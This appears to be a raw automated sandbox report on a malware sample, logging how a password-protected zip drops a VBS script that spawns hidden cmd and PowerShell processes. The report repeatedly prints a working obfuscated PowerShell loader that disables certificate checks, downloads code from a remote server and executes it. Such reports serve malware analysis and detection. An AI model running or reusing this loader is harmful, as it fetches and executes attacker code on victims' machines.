$((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "Jump to behavior
Source: Google.Widevine.CDM.dll.0.drStatic PE information: section name: .00cfg
Source: Google.Widevine.CDM.dll.0.drStatic PE information: section name: .gxfg
Source: Google.Widevine.CDM.dll.0.drStatic PE information: section name: .retplne
Source: Google.Widevine.CDM.dll.0.drStatic PE information: section name: .voltbl
Source: Google.Widevine.CDM.dll.0.drStatic PE information: section name: _RDATA
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\Google.Widevine.CDM.dllJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\Google.Widevine.CDM.dllJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\LICENSE.txtJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 1000000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: 4AD0000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeWindow / User API: threadDelayed 496Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeWindow / User API: threadDelayed 9502Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2990Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6691Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6808Thread sleep count: 496 > 30Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6808Thread sleep time: -248000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6808Thread sleep count: 9502 > 30Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6808Thread sleep time: -4751000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep count: 2990 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep count: 6691 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -22136092888451448s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 3_2_00E0B1D6 GetSystemInfo,3_2_00E0B1D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000008.00000002.3600888684.000000000613E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3599216434.0000000003182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000008.00000002.3599216434.0000000003182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 54.39.156.32 443Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($ksjqtmc = $('{5}{4}{1}' -f $('uxhxeilt'.tochararray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($ksjqtmc) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($ksjqtmc = $('{5}{4}{1}' -f $('uxhxeilt'.tochararray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($ksjqtmc) "
